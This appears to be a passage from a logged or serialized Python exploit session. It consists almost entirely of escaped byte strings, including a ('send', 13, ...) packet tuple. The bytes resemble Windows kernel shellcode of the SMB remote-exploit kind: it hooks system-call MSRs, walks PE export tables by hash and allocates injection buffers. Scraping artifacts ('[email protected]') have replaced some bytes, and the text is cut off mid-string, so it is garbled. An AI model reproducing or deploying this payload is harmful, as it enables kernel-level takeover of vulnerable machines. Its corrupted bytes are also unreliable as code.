\\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 13, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\